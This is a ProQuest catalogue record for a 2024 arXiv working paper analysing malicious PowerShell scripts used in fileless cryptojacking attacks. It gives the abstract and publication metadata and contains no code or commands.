Content area

Abstract

Translate

Fileless malware predominantly relies on PowerShell scripts, leveraging the native capabilities of Windows systems to execute stealthy attacks that leave no traces on the victim's system. The effectiveness of the fileless method lies in its ability to remain operational on victim endpoints through memory execution, even if the attacks are detected, and the original malicious scripts are removed. Threat actors have increasingly utilized this technique, particularly since 2017, to conduct cryptojacking attacks. With the emergence of new Remote Code Execution (RCE) vulnerabilities in ubiquitous libraries, widespread cryptocurrency mining attacks have become prevalent, often employing fileless techniques. This paper provides a comprehensive analysis of PowerShell scripts of fileless cryptojacking, dissecting the common malicious patterns based on the MITRE ATT&CK framework.

Details

1009240
Subject
Scripts;
Cryptocurrency mining;
Digital currencies
Identifier / keyword
Cryptography and Security
URL
http://arxiv.org/abs/2401.07995
Title
The Pulse of Fileless Cryptojacking Attacks: Malicious PowerShell Scripts
Author
Varlioglu, Said; Elsayed, Nelly; Varlioglu, Eva Ruhsar; Ozer, Murat; ElSayed, Zag
Publication title
arXiv.org; Ithaca
Publication year
2024
Publication date
Feb 21, 2024
Section
Computer Science
Publisher
Cornell University Library, arXiv.org
Source
arXiv.org
Place of publication
Ithaca
Country of publication
United States
University/institution
Cornell University Library arXiv.org
Publication subject
Biology, Statistics, Physics, Mathematics, Engineering--Electrical Engineering, Computers--Computer Engineering, Business And Economics--Banking And Finance
e-ISSN
2331-8422
Source type
Working Paper
Language of publication
English
Document type
Working Paper
Publication history
 
 
Online publication date
2024-02-22
Milestone dates
2024-01-15 (Submission v1); 2024-02-21 (Submission v2)
Publication history
 
 
   First posting date
22 Feb 2024
ProQuest document ID
2930092111
Document URL
https://www.proquest.com/working-papers/pulse-fileless-cryptojacking-attacks-malicious/docview/2930092111/se-2?accountid=208611
Full text outside of ProQuest
http://arxiv.org/abs/2401.07995
Copyright
© 2024. This work is published under http://arxiv.org/licenses/nonexclusive-distrib/1.0/ (the “License”). Notwithstanding the ProQuest Terms and Conditions, you may use this content in accordance with the terms of the License.
Last updated
2024-02-23
Database
ProQuest One Academic